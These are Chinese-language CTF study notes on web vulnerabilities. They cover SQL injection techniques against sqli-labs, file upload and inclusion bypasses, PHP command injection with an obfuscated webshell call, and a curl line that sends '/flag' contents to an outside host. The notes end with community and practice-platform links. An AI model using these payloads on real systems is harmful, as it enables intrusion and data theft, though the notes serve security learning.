常见漏洞
sql注入
联合查询
sqli-labs less-1
判断后台sql语句闭合方式
order by判断列数
判断回显位
注数据
''1'' LIMIT 0,1' '1'' LIMIT 0,1 select * from users where id='$id' LIMIT 0,1 select * from users where id='1'#' LIMIT 0,1
|
?id=-1' union select 1,2,3 %23 ?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata%23
|
盲注
sqli-labs Less-5
bool盲注
?id=1' and 0%23
?id=1' and if(substr(database(),1,1)='s',1,0)%23
1 and 1 ==> 1 0 or 1 ==> 1
|
延时注入
?id=1' and if(substr(database(),1,1)='s',sleep(3),0)%23
|
报错注入
sqli-labs Less-5
-1' and updatexml(1,concat(0x7e,database()),1)%23
|
updatexml(XML_document, XPath_string, new_value)
XML_document是文档对象的名称
XPath_string是XPath格式的字符串(如果XPath_string不是XPath格式,则会报错并显示出XPath_string的值)
new_value替换查找到的数据
文件上传&文件包含
黑名单
php3 php5 phtml .htaccess .user.ini
白名单
没办法,看看有没有其他洞 解析漏洞
各种包含getshell
简单的包含图片马
包含data://
php://input
与php的配置有关
代码注入&命令注入
一些敏感的函数
system shell_exec `` exec …..
eval assert
php语言的特性
无字母数字webshell 异或 取反
<?php // echo urlencode(~'system'); (~urldecode('%8C%86%8C%8B%9A%92'))('id');
|
dnslog
http://dnsbin.zhack.ca/
curl 1.1.1.1:9000/?a=`cat /flag`
|
反序列化
https://moonback1314.gitee.io/2019/10/27/php-serialize/
https://paper.seebug.org/680/
https://moonback1314.gitee.io/2019/10/27/php-serialize/20191027210743.png
|
学习的一些建议
多关注圈子社区公众号大佬博客
https://xz.aliyun.com
https://www.anquanke.com
https://paper.seebug.org
https://www.t00ls.net
https://www.freebuf.com
https://www.leavesongs.com
https://skysec.top
https://www.smi1e.top
http://www.gem-love.com
比赛
https://ctftime.org/
微信小程序信安大赛
qq群
做题平台
https://buuoj.cn
https://www.ctfhub.com
https://www.jarvisoj.com
https://adworld.xctf.org.cn
https://cgctf.nuptsast.com
https://ctf.show
https://www.bugku.com
多搜多看
https://www.php.net/manual/zh/index.php
https://www.google.com
http://www.baidu.com